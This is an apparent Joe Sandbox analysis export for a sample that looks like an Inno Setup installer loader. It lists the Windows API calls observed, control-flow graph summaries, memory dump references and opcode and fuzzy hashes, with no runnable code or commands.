                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                    • API String ID: 3586484885-3001827809
                                                                                                    • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                    • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                    • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                    • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000), ref: 00409A70
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                    • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8), ref: 00409AA4
                                                                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02262480), ref: 0040966C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                    • String ID: D
                                                                                                    • API String ID: 3356880605-2746444292
                                                                                                    • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                    • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                    • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                    • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                                    Control-flow Graph

                                                                                                    [Control-flow graph image: basic blocks 401918-4019cd; nodes marked Executed / Not Executed; calls RtlInitializeCriticalSection, RtlEnterCriticalSection, LocalAlloc, RtlLeaveCriticalSection and sub_4012dc]
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 730355536-0
                                                                                                    • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                    • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                    • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                    • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: .tmp$y@
                                                                                                    • API String ID: 2030045667-2396523267
                                                                                                    • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                    • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                    • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                    • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: .tmp$y@
                                                                                                    • API String ID: 2030045667-2396523267
                                                                                                    • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                    • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                    • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                    • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID: .tmp
                                                                                                    • API String ID: 1375471231-2986845003
                                                                                                    • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                    • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                    • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                    • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                                    Control-flow Graph

                                                                                                    [Control-flow graph image: basic blocks 4076dc-407917; nodes marked Executed / Not Executed; calls WriteFile, InterlockedExchange and subroutines 40748c, 4073ec, 407890]
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                    • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                    • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                    • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                                    Control-flow Graph

                                                                                                    [Control-flow graph image: basic blocks 401fd4-402158; nodes marked Executed / Not Executed; calls RtlEnterCriticalSection, RtlLeaveCriticalSection and subroutines 401918, 401ee0, 402f54]
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                      • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                      • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                      • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                      • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 296031713-0
                                                                                                    • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                    • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                    • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                    • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                                    Control-flow Graph

                                                                                                    [Control-flow graph image: single basic block 406fa0-406ff3; nodes marked Executed / Not Executed; calls SetErrorMode, subroutine 403414, LoadLibraryA]
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2987862817-0
                                                                                                    • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                    • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                    • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                    • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph (node: address range, API call, successor nodes):
                                                                                                    • 448: 40762c-40764a, ReadFile -> 449, 450
                                                                                                    • 449: 407663-40766a
                                                                                                    • 450: 40764c-407650 -> 451, 452
                                                                                                    • 451: 407652-40765a, GetLastError -> 449, 452
                                                                                                    • 452: 40765c-40765e, call 40748c -> 449
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1948546556-0
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2087232378-0
                                                                                                    APIs
                                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                      • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                      • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                    Similarity
                                                                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1658689577-0
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 442123175-0
                                                                                                    APIs
                                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 1306739567-0
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNEL32(?,02278000,0040AA59,00000000), ref: 004076B3
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 734332943-0
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                    • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                    • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                    • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                    • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                    • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                    • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                    APIs
                                                                                                    • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrev
                                                                                                    • String ID:
                                                                                                    • API String ID: 122130370-0
                                                                                                    • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                    • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                    • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                    • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                    • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                    • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                    • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                    • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                    • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                    • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                    • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                    • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                    Memory Dump Source
